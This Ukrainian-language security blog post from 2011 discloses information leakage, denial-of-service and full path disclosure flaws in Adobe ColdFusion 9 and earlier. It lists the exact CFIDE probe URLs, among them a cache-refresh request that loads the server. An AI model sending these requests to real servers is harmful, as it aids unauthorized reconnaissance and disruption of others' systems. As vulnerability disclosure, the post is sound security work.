Websecurity - Веб безпека

21.09.2011

У червні, 30.06.2011, я знайшов нові уразливості в Adobe ColdFusion, зокрема Information Leakage, Denial of Service та Full path disclosure. Які я виявив на багатьох сайтах, що використовують ColdFusion. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про XSS та FPD уразливості в Adobe ColdFusion.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

14.11.2011

Information Leakage:

http://site/CFIDE/componentutils/packagelist.cfm

Витік списку всіх компонентів встановлених на сервері та шляхів до них.

DoS:

http://site/CFIDE/componentutils/packagelist.cfm?refreshCache=yes

При даному запиті відбувається оновлення кешу компонентів, що призводить до навантаження на сервер, якщо встановлена велика кількість компонентів.

Full path disclosure:

http://site/CFIDE/adminapi/_datasource/formatjdbcurl.cfm
http://site/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm
http://site/CFIDE/adminapi/_datasource/geturldefaults.cfm
http://site/CFIDE/adminapi/_datasource/setdsn.cfm
http://site/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm
http://site/CFIDE/adminapi/_datasource/setsldatasource.cfm
http://site/CFIDE/adminapi/customtags/l10n.cfm
http://site/CFIDE/debug/cf_debugFr.cfm (в тілі сторінки з фреймами)

В адмінці ColdFusion є ще багато FPD.

Уразливі Adobe ColdFusion 9 та попередні версії.

This entry was posted on 23:54 14.11.2011 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.